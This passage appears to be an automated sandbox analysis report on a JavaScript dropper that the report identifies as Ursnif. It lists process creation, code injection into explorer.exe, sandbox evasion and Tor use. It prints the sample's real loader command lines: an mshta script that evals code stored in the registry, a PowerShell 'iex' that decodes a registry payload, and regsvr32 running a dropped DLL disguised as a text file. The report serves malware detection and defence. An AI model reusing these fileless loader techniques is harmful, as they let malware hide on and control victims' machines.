Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TAvvi.txt
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\TAvvi.txt
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:82950 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:17432 /prefetch:2
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TAvvi.txtJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\TAvvi.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:82950 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5332 CREDAT:17432 /prefetch:2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Submission file is bigger than most known malware samplesShow sources
Source: my_presentation_o6y.jsStatic file information: File size 3553741 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000011.00000002.1204970054.0000000007010000.00000002.00000001.sdmp
Source: Binary string: c:\Users\Randy\OneDrive\Projects\formoney\microtor\bin\x64\Release\tordll.pdb source: explorer.exe, 00000011.00000002.1204572263.0000000005BDB000.00000002.00000001.sdmp
Source: Binary string: c:\exercise\Study\just\month\fraction\shortBorn.pdb source: TAvvi.txt.0.dr
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000004.00000003.1122651667.0000000006600000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000004.00000003.1122651667.0000000006600000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000011.00000002.1204970054.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
PE file contains an invalid checksumShow sources
Source: TAvvi.txt.0.drStatic PE information: real checksum: 0x31b79 should be: 0x38b9c
Binary may include packed or encrypted codeShow sources
Source: initial sampleStatic PE information: section name: .text entropy: 6.81480463595

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\TAvvi.txtJump to dropped file
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\TAvvi.txtJump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000004.00000003.1011270018.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011384167.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011678678.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000011.00000002.1204294461.0000000005B3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000003.1129699118.000001DE97D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011483146.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1118478051.0000000005F70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011647526.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1010975303.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011574267.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1011138390.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000003.1036927983.0000000005ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5652, type: MEMORY
Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2928, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 5928, type: MEMORY
May use the Tor software to hide its network trafficShow sources
Source: explorer.exe, 00000011.00000002.1204600072.0000000005BE0000.00000004.00000001.sdmpBinary or memory string: onion-port
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6250
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2550
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4212Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000011.00000002.1205717068.0000000007340000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000011.00000002.1207879160.0000000007CD5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 00000011.00000002.1205717068.0000000007340000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000011.00000002.1205717068.0000000007340000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000011.00000002.1205717068.0000000007340000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: TAvvi.txt.0.drJump to dropped file
Allocates memory in foreign processesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\System32\control.exe base: CD0000 protect: page execute and read and writeJump to behavior
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 352A1000
Maps a DLL or memory area into another processShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeThread register set: target process: 5928Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: CD0000Jump to behavior
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\TAvvi.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmpBinary or memory string: hProgram ManagerWE
Source: explorer.exe, 00000011.00000000.1143604429.0000000001170000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: explorer.exe, 00000011.00000002.1187564389.0000000000A30000.00000004.00000020.sdmpBinary or memory string: Progman{
Source: explorer.exe, 00000011.00000002.1187564389.0000000000A30000.00000004.00000020.sdmpBinary or memory string: PProgmancci\Ap

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
